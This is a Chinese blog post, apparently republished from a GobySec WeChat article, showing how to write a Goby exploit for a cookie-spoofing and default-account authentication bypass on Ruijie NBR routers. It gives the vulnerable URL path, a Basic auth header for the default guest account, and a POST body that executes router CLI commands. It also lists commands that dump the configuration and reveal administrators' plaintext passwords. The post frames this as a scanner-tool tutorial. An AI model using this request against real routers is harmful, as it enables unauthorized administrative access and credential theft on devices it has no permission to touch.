01
02
编写流程
漏洞名称:锐捷NBR路由器COOKIE欺骗权限绕过
详情:锐捷设备保留两个账户manager和guest,并且这两个账户都不能删除,默认密码同账户名。如下图只要修改完cookie在重新刷新一下即可登录到admin管理界面。
修改完cookie刷新之后是这样子的,左侧菜单栏都出现了:
如果是没有认证,执行这个命令是不会有结果的,如下图:
漏洞URL
/WEB_VMS/LEVEL15/
Header部分
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Data部分
command=show clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
查看配置
show run
查看LAN和WAN口
show sys-mod
查看用户等等
show webmaster users
首先,找到刚才编写的POC自动生成的JSON文件。
路径:goby-win-x64-1.8.202golibexploitsuser
在Scanstep上面添加语句:
其实这部分,要是细心的小伙伴就能发现Goby和FOFA写EXP是一个样子的。
所以接下来,和FOFA一样有个ExploitSteps部分,但是goby相对于FOFA来说好写的很多,只需要将Scanstep部分复制下来即可,这就是说为什么写完PoC部分相当于完成EXP的80%了,然后添加output|lastbody把响应的body展示出来,OK了。
看一下结果,show webmaster users看的是账号的明文密码,ruijie@2017
结果是支持正则匹配,但是因为还不算完善,不能做多个匹配,这里就直接显示admin的密码就好了:
show webmaster users
03
正则真是菜出天际了!各位见笑了。我觉得Exp部分还是挺有意思的,利用漏洞的时候方便一些!也能更好的理解Goby吧!还是那句话,我很喜欢Goby,特别适合我这种又菜又懒又严重依赖工具的脚本小子,软件又不会写,但是工具咱必须要用明白哈哈!祝Goby越来越好。
本文始发于微信公众号(GobySec):技术分享 | 自定义漏洞之EXP
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论